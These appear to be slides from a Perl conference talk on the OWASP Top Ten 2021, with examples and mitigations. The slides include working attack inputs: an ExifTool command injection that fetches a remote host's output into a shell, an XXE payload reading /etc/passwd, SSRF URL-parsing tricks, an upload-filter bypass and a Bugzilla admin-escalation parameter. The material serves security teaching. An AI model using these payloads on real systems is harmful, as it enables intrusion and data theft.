# About me

* Renée Bäcker
  * Owner of <a href="https://perl-services.de">Perl-Services.de</a> (<a href="https://metacpan.org/author/PERLSRVDE">PERLSRVDE @ cpan</a>)
  * <a href="https://perl-academy.de">Perl-Academy.de</a>
  * <a href="https://metacpan.org/author/RENEEB">RENEEB @ cpan</a>
  * Interests: Perl, IT-Security

------

# OWASP

- <a href="https://owasp.org">Open Web Application Security Project</a>
- is a non-profit foundation
- provides tools, trainings, other information
- local chapters
  - active meetup groups: München, Frankfurt, Hamburg, Stuttgart, Köln, Hannover, Karlsruhe, Dresden, Ruhrpott, Heilbronn-Franken

------

# OWASP Top Ten

- ~ every 4 years a <a href="https://owasp.org/Top10/">list of the top security risks</a> is published
- latest edition: autumn 2021
- a good list what to look for in your own code

---

# Top Ten 2021

* 10. <a href="https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/">Server-Side Request Forgery (SSRF)</a>
* 9. <a href="https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/">Security Logging and Monitoring Failures</a>
* 8. <a href="https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/">Software and Data Integrity Failures</a>
* 7. <a href="https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/">Identification and Authentication Failures</a>
* 6. <a href="https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/">Vulnerable and Outdated Components</a>

---

# Top Ten 2021

* 5. <a href="https://owasp.org/Top10/A05_2021-Security_Misconfiguration/">Security Misconfiguration</a>
* 4. <a href="https://owasp.org/Top10/A04_2021-Insecure_Design/">Insecure Design</a>
* 3. <a href="https://owasp.org/Top10/A03_2021-Injection/">Injection</a>
* 2. <a href="https://owasp.org/Top10/A02_2021-Cryptographic_Failures/">Cryptographic Failures</a>
* 1. <a href="https://owasp.org/Top10/A01_2021-Broken_Access_Control/">Broken Access Control</a>

---

# Note

* This talk is just an overview

------

# Server-Side Request Forgery (SSRF)

## Likely affected

* RSS-Feed aggregators (where users can add feeds)
* Image/File upload tools
* WebHooks
* XML Uploads

---

# Server-Side Request Forgery (SSRF)

<img src="images/ssrf.svg">

---

# Server-Side Request Forgery (SSRF)

<img src="images/ssrf_private.svg">

---

# Server-Side Request Forgery (SSRF)

## Impact

* Likely data leaks
  * cloud metadata
  * sensitive data exposure
* XML attacks
* Remote Code Executions
* Denial of Service

---

# Server-Side Request Forgery (SSRF)

## Mitigation

* Build Allow lists
* Build Block lists
* Do not allow URLs in user input
* Use "deny by default" firewall policies
* Do not send raw responses to clients
* Disable HTTP redirections

---

# Server-Side Request Forgery (SSRF)

## Parsing URLs is hard

```
----- URL: http://foo@evil.com:8080@google.com ------
---- Mojo::URL ---
Host: evil.com:8080@google.com
Port: <undefined>
---- URI ---
Host: google.com
Port: 80
---- URI::XS ---
Host: 
Port: 0
---- URL::XS ---
Host: <undefined>
Port: <undefined>
[URL_ERROR]: Could not parse url: http at ssrf/uri_parser.pl line 40.

---- HTTP::Tiny ---
Host: evil.com:8080@google.com
Port: 80
```

---

# Server-Side Request Forgery (SSRF)

## Parsing URLs is hard

```
----- URL: http://127.0.0.1:11211:80 ------
---- Mojo::URL ---
Host: 127.0.0.1:11211
Port: 80
---- URI ---
Host: 127.0.0.1:11211
Port: 80
---- URI::XS ---
Host: 
Port: 0
---- URL::XS ---
Host: 127.0.0.1
Port: 11211
---- HTTP::Tiny ---
Host: 127.0.0.1:11211
Port: 80
```

------

# Security Logging and Monitoring Failures

* do you know what's going on in your app?

---

# Security Logging and Monitoring Failures

* Logging helps to detect attacks and data breaches
* Impact on liability, incident alerting and forensics
* possible data leaks when logging events are visible for users

---

# Security Logging and Monitoring Failures

## Mitigation

* log all login, access control and input validations failures
  * log user context to identify accounts
* Do not store logs only locally
* Ensure log data is encoded correctly to prevent injections or attacks
* Establish monitoring and alerting

---

# Security Logging and Monitoring Failures

* Logging can be used for other security tools as well, e.g. _fail2ban_

<https://blog.perl-academy.de/2021-02-03-perl-anwendungen-fail2ban>

---

# Security Logging and Monitoring Failures

* Beware of injections - log4j was fun in December 2021 ;-)

---

# Security Logging and Monitoring Failures

* We have several logging solutions in Perl
* Log::Log4perl, Log::Any, Mojo::Log, ...
* Use the right log level for the log message

------

# Software and Data Integrity Failures

* Includes notable Common Weakness Enumerations (CWEs)
  * CWE-829: Inclusion of Functionality from Untrusted Control Sphere
  * CWE-494: Download of Code Without Integrity Check
  * CWE-502: Deserialization of Untrusted Data

---

# Software and Data Integrity Failures

* Many frontend developers use JavaScript libraries from CDNs
* Attackers may try to replace those libraries with malicious code
  * many websites affected immediately

---

# Software and Data Integrity Failures

## CPAN is/should be an untrusted control sphere

* Anybody can upload a dist 
  * but cannot take over already used namespaces
  * takeover has a long procedure
* Do you know what CPAN mirror your CPAN client uses?
* Do you know what the authors do in their code?
* Do you use the checksums to check the downloads?
* Do you verify signatures?

---

# Software and Data Integrity Failures

## CPAN and checksums

Neil Bowers wrote a nice blog post about that:
<http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html>

---

# Software and Data Integrity Failures

## CPAN and checksums

* Whenever an author uploads a new dist/release, PAUSE generates the checksums
* Every author directory has a _CHECKSUMS_ file
* Not every CPAN client uses the checksums

---

# Software and Data Integrity Failures

## CPAN and checksums

_cpan.org/authors/id/R/RE/RENEEB/CHECKSUMS_
```
0&&<<''; # this PGP-signed message is also valid perl
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

# CHECKSUMS file written on Wed Feb 23 15:17:53 2022 GMT by CPAN::Checksums (v2.13)
$cksum = {
  ...
  'HTTP-Tiny-Multipart-0.08.tar.gz' => {
    'cpan_path' => 'R/RE/RENEEB',
    'md5' => '7be1202ad8065363ed860425d51eded2',
    'md5-ungz' => '8e6ece69334814e1ae38977fc6f8ffbe',
    'mtime' => '2018-04-30',
    'sha256' => 'ed0d43d470797c236be7f83e414e31561560ef3f88fab1ec09def20d98c361d6',
    'sha256-ungz' => 'ce6e6e4e70af89764f633bb3c4e6599631925aa8ebec52e7e9b8ea5c7963752a',
    'size' => 9067
  },
  ...
};
__END__
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.14 (GNU/Linux)

iQEcBAEBAgAGBQJiFlAhAAoJELahc5BjdgzK7NMH/2M0IafWFitynRJfBvvThzNS
7qti+h/locBCaawHp25cIxEaN03leZ/YbNw2iUVsqSPeSZ6U4V6As9ls/VheElHH
etpD2m6WTKmqGOQYRW9cXH5dPbBtaJNQbjczvGfEmeQgUBYPfDBVDWb7PxvTCuUr
WCuZySk9issRmK3NcfwgPlOD/mgvkK6X+HLL4ZcaamPzYq3pOHM1tEAqDlGxdfHr
IAC9LOM11P+g7CrinNy/HRSai8rHM67MmHmj4yflTXfTiau6oxJjwckRmo27WeYH
RcjEoFEHcPEyXSXBNhPv5uvATA0aFV3wcXa5jZIIP5c1EZwQJxrFeOoNLlBCQo0=
=DGKR
-----END PGP SIGNATURE-----

```

---

# Software and Data Integrity Failures

## CPAN and checksums

* There are four main CPAN clients
  * cpan
  * cpanm
  * cpm
  * cpanp

---

# Software and Data Integrity Failures

## CPAN and checksums - Mitigation

* enable the use of HTTPS
* enable checksum verification
* host your own (Mini-)CPAN mirror

---

# Software and Data Integrity Failures

* There is more about a secure supply chain in Perl
* (Hopefully) I will talk about that next year

------

# Identification and Authentication Failures

Application may

* permit automated attacks like credential stuffing, brute force
* permit default, weak or well-known passwords
* uses weak credential recovery and forgot-password processes
* uses plain-text, encrypted, or weakly hashed password data stores
* has missing or ineffective multi-factor authentication
* exposes session identifier in the URL
* does not correctly invalidate session ids

---

# Identification and Authentication Failures

<img src="images/aws-login-failed.png">
<img src="images/netflix-login-failed.png">
<img src="images/otobo-login-failed.png">

---

# Identification and Authentication Failures

* Attackers can use those information and
  * start phishing attacks
  * check if password leaks for the found mail addresses exist
  * DoS for the users (when applications use logging and monitoring)

---

# Identification and Authentication Failures

* Brute force attacks may bring down your services
* Data leaks have an impact on your image

---

# Identification and Authentication Failures

## Mitigation

* Use cookies for session management
  * don't fear GDPR ;-)
  * Cookienames shouldn't disclose used technology (e.g. _PHPSESSID_)
* Use generic error message that do not disclose information
* Store hashed and salted passwords in the database

---

# Identification and Authentication Failures

## Some Perl libraries

* Crypt::Argon2
* Crypt::Bcrypt
* Data::Password::Top10000

------

# Vulnerable and Outdated Components

* Written once, checked never again
* Do you know what version of dependencies you use?
* Do you check the dependecies regularly?
* Do you replace old versions?

---

# Vulnerable and Outdated Components

* balancing act
  * maintenance burdens
  * stable application
  * security

---

# Vulnerable and Outdated Components

* Don't forget non-Perl components
  * webserver
  * database
  * operating system
  * or even hardware

---

# Vulnerable and Outdated Components

## Mitigation

* implement a process to identify vulnerable and outdated components
* implement a patch management process
* remove unnecessary dependencies, features, components, files, ...
* search for vulnerabilities (e.g. <https://cve.mitre.org/cve/search_cve_list.html>)

---

# Vulnerable and Outdated Components

## Mitigation

* CPAN::Audit
  * new versions will be released soon (hopefully)
  * can be added to your git workflow and/or CI/CD pipeline 

---

# Vulnerable and Outdated Components

```perl [15|16,19|21,22,23|27|31|]
#!/usr/bin/perl

use v5.24;
  
use strict;
use warnings;

use File::Basename;
use File::Spec;
use CPAN::Audit::DB;
use CPAN::Audit::Query;
use CPANfile::Parse::PPI;

my $basedir = File::Spec->catdir( dirname(__FILE__), '..','..');
my $file    = File::Spec->catfile( $basedir, qw/cpanfile/ );
my $db      = CPAN::Audit::DB->db;
my $query   = CPAN::Audit::Query->new( db => $db );

my $cpanfile = CPANfile::Parse::PPI->new( $file );

MODULE:
for my $module ( $cpanfile->modules->@* ) {
    my $distname = $db->{module2dist}->{$module->{name}};

    next MODULE if !$distname;

    my @advisories = $query->advisories_for( $distname, $module->{version} );

    next MODULE if !@advisories;

    print sprintf "There are advisories for %s %s\n", $module->{name}, $module->{version};
}
```

---

# Vulnerable and Outdated Components

```perl
requires 'Mojolicious' => 8.42;
requires 'Archive::Zip' => 0;
```

---

# Vulnerable and Outdated Components

```
$ git commit -m "another change" -a
There are advisories for Archive::Zip 0
[master 111afac] another change
 1 file changed, 1 insertion(+), 1 deletion(-)
```
------

# Security Misconfiguration

<img src="images/RedisUnsecured.png">

---

# Security Misconfiguration

<img src="images/ElasticSearchLeak.png">

---

# Security Misconfiguration

<img src="images/ABC_AWS_Leak.png">

---

# Security Misconfiguration

<img src="images/Stacktrace.png">

---

# Security Misconfiguration

* missing security hardening
* improperly configured permissions on cloud services
* unnecessary features are enabled or installed (e.g. unnecessary ports, services, accounts, ...)
* default accounts and their passwords are still enabled and unchanged
* disclose stacktraces in error messages to users

---

# Security Misconfiguration

* servers do not send security headers
* security settings in application servers/frameworks/libraries ... are not set to secure values
* XML parsing allows external entities
* ...

---

# Security Misconfiguration

## XEE example

```xml [2-6|9,10|]
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE code [
  <!ELEMENT cmd ANY>
  <!ENTITY file_test SYSTEM "file:///etc/passwd">
  <!ENTITY tames SYSTEM "http://honeypot.perl-services.de">
]>
<code>
    <greeting>Hello GPW2022</greeting>
    <tames_content>&tames;</tames_content>
    <cmd>&file_test;</cmd>
</code>
```

---

# Security Misconfiguration

## XEE example

```perl [1,2|8|]
my $parser = XML::LibXML->new;
$parser->expand_entities(1);

my $tree   = $parser->parse_file( 'passwd.xml' );
my $root   = $tree->getDocumentElement;

say $root->findvalue( 'greeting' );
say $root->findvalue( 'tames_content' );
say $root->findvalue( 'cmd' );
```

---

# Security Misconfiguration

## XEE example

```
Hello GPW2022
{"epoche":1648282321,"id":1648282321,"success":1}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
```

---

# Security Misconfiguration

## Mitigation

* implement a process to review and update configurations
* send security directives to clients, e.g. Security Headers
* Code/Container scans
* Disable external entities in XML

---

# Security Misconfiguration

## Perl modules

* Mojolicious::Plugin::SecurityHeader
* Plack::Middleware::Header
* Perl::Critic

------

# Insecure Design

* Insecure design ≠ Insecure implementation
* Requirements and resource management
* Threat modeling
* Learn from mistakes

---

# Insecure Design

## Example

* Check if uploaded file is possibly "malicious"
   1. Check if file extension is prohibited
   2. Sanitize file name

---

# Insecure Design

## Example

* Check if uploaded file is possibly "malicious"
   1. Check if file extension is prohibited
      * `testfile.p h p` (note the whitespaces)
      * `.p h p` is not considered harmful 
   2. Sanitize file name
      * `testfile.php`
      * `.php` would be classified as harmful 

---

# Insecure Design

## Example

* "Recover password" functionality based on questions and answers
  * many answers can be guessed (esp. with Social Media)
* Mixing trusted and untrusted data
  * user data from authentication system vs. user data in HTTP requests

---

# Insecure Design

## Mitigation

* Threat modeling
* OWASP SAMM (Software Assurance Maturity Model)
* Implement review processes

------

# Injection

An attacker can execute unintended commands or gain access to sensitive data by injecting
malicious data as part of a command or query.

* (No)SQL injections
* OS commands
* Cross-site scripting (XSS)
* LDAP injections

---

# Injection

## Example

```perl
use Image::ExifTool;

my $exif  = Image::ExifTool->new;
my $image = $ARGV[0];

my $fh = $exif->Open( \*FH, $image );
```

```
$ perl exif.pl "\`wget -O - http://honeypot.perl-services.de\` |"
```

(fixed in `Image::ExifTool 12.38` which is not released to CPAN yet)

---

# Injection

## Example

```
$ perl exif.pl 
Name "main::FH" used only once: possible typo at exif.pl line 13.
--2022-03-26 09:00:46--  http://honeypot.perl-services.de/
Resolving honeypot.perl-services.de (honeypot.perl-services.de)... 195.201.42.6
Connecting to honeypot.perl-services.de (honeypot.perl-services.de)|195.201.42.6|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 49 [application/json]
Saving to: ‘STDOUT’

-                                    100%[====================================================================>]      49  --.-KB/s    in 0s      

2022-03-26 09:00:46 (9.16 MB/s) - written to stdout [49/49]

sh: 1: {"epoche":1648285246,"id":1648285246,"success":1}: not found
$ 
```

---

# Injection

## Mitigation

* Use positive server-side input validation
* Use parameterized SQL queries
* Check for known vulnerabilities
* Use latest versions of libraries

------

# Cryptographic Failures

* weak or lack of cryptography
  * storing passwords: plaintext or MD5 hashes
* hard-coded passwords in code
* insufficient entropy

---

# Cryptographic Failures

* data transmissions in clear text (HTTP, SMTP, FTP)
* old ciphers in use?

---

# Cryptographic Failures

## Mitigation

* classify data processed, stored, transmitted
* disable caching for sensitive data
* disable legacy protocols
* store passwords using salted hashing functions

------

# Broken Access Control

Remember 34C3 (2014) - "The Perl Jam"

<img src="images/BugzillaBug.png">

---

# Broken Access Control

```perl
my $otheruser = Bugzilla::User->create({
    login_name => $login_name, 
    realname   => $cgi->param('realname'), 
    cryptpassword => $password});
```

---

# Broken Access Control

What happens with

_http://.../?realname=Renee&realname=admin&realname=1_ ?

---

# Broken Access Control

```perl
my $otheruser = Bugzilla::User->create({
    login_name => $login_name, 
    realname   => Renee,
    admin   => 1,
    cryptpassword => $password});
```

---

# Broken Access Control

* Bypassing access control checks by modifying e.g. URL, HTML page, API requests
* Violation of the principle of least privilege
* Missing access controls
* Elevation of privilege
* CORS misconfiguration

---

# Broken Access Control

```perl
my $sql = 'SELECT * FROM accounts WHERE id = ?';
my $sth = $dbh->prepare( $sql );
$sth->execute( $c->param('account_id') );
```

Attacker may pass any value for `account_id`

---

# Broken Access Control

```perl [2,14|5|7-11|13|]
# in Mojolicious application
sub startup {
    # ...

    my $r = $self->routes;

    my $auth_route = $r->under('/')->to(cb => sub ($c) {
        return 1 if $c->is_logged_in;
        $c->redirect_to('index');
        return;
    });

    $r->get('/account/:id')->to( cb => sub { ... } );
}
```

---

# Broken Access Control

## Mitigation

* Deny access by default
* Log access control failures, alert admins
* Rate limit API and controller access
* invalidate session identifiers after logout
* implement access control mechanisms

------

# Help wanted

I'd like to create a cheatsheet for Perl

* <https://cheatsheetseries.owasp.org/IndexTopTen.html>

=> <https://perl-security.de>

contact me at info@perl-services.de

------

# Questions?

Slides (as markdown source) and demo code:

- <https://os.perl-services.de/perl-academy/talks/-/tree/main/2022/gpw>

Slideshow:

- <https://talks.perl-academy.de/2022/gpw/>

